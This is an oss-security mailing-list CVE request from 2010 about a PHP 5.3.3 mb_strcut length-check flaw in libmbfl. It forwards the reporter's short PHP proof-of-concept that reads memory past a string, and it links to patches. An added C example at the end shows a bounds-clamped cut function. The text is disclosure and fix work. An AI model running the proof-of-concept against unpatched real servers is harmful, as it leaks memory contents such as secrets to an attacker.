Date: Sun, 7 Nov 2010 21:22:22 +0100
From: Pierre Joye <pierre.php@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request: PHP 5.3.3, libmbfl, mb_strcut

hi,

Mateusz reported the following issue earlier today.

Updated patch, tests pass now: http://pastie.org/1279682

Information disclosure flaw. PHP 5.2 is not affected (newer version of libmbfl).

PHP 5.3 and trunk use libmbfl 1.1.0.


---------- Forwarded message ----------
From: Mateusz Kocielski <m.kocielski@...il.com>
Date: Sun, Nov 7, 2010 at 6:47 PM
Subject: mb_strcut
To: security@....net


Hello,

 I've found a flaw in the mb_strcut function: PHP doesn't check the length
parameter passed to the function in all possible cases.

 Simple exploitation:

<?php
$b = "bbbbbbbbbbb";
str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1);
$var3 = mb_strcut($b, 0, 1000);
echo $var3;
?>

Pierre suggested the following patch:
http://pastie.org/pastes/1279428/text . I've tested it with your test
suite, one of the mbstring related test cases failed: Bug #49354
(mb_strcut() cuts wrong length when offset is in the middle of a
multibyte character) [ext/mbstring/tests/bug49354.phpt]


-- 
Pierre

@pierrejoye | http://blog.thepimp.net | http://www.libgd.org
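
The bound this report says is missing, as an added C example (not libmbfl's code and not the patch linked above): a byte-oriented cut that clamps the requested length to the source buffer and keeps character boundaries intact, the case named in the title of Bug #49354. The function name, its signature and the UTF-8-only handling are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* UTF-8 continuation bytes have the form 10xxxxxx. */
static int is_cont(unsigned char b) { return (b & 0xC0) == 0x80; }

/*
 * utf8_strcut (hypothetical name): copy at most `length` bytes of the
 * src_len-byte UTF-8 buffer `src`, starting at byte offset `from`, into dst.
 * Never reads past src + src_len and never emits a partial character.
 * Returns the number of bytes written (without the NUL), or (size_t)-1.
 */
size_t utf8_strcut(const char *src, size_t src_len, size_t from,
                   size_t length, char *dst, size_t dst_cap)
{
    size_t end;

    if (src == NULL || dst == NULL || dst_cap == 0)
        return (size_t)-1;
    if (from > src_len)                 /* start beyond the data: empty cut */
        from = src_len;
    /* Offset inside a multibyte character: back up to its first byte. */
    while (from > 0 && from < src_len && is_cont((unsigned char)src[from]))
        from--;
    /* The bound the report is about: length may not exceed what is left. */
    if (length > src_len - from)
        length = src_len - from;
    end = from + length;                /* cannot overflow after the clamp */
    /* End inside a multibyte character: drop the partial character. */
    while (end > from && end < src_len && is_cont((unsigned char)src[end]))
        end--;
    if (end - from >= dst_cap)          /* leave room for the terminator */
        return (size_t)-1;
    memcpy(dst, src + from, end - from);
    dst[end - from] = '\0';
    return end - from;
}

int main(void)
{
    const char b[] = "bbbbbbbbbbb";     /* constructed input, as in the PoC */
    char out[64];
    size_t n = utf8_strcut(b, strlen(b), 0, 1000, out, sizeof out);

    printf("%zu bytes: %s\n", n, out);
    return 0;
}
```

With the PoC's arguments (offset 0, length 1000) the result is limited to the 11 bytes of the input, so nothing beyond the source string is copied.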
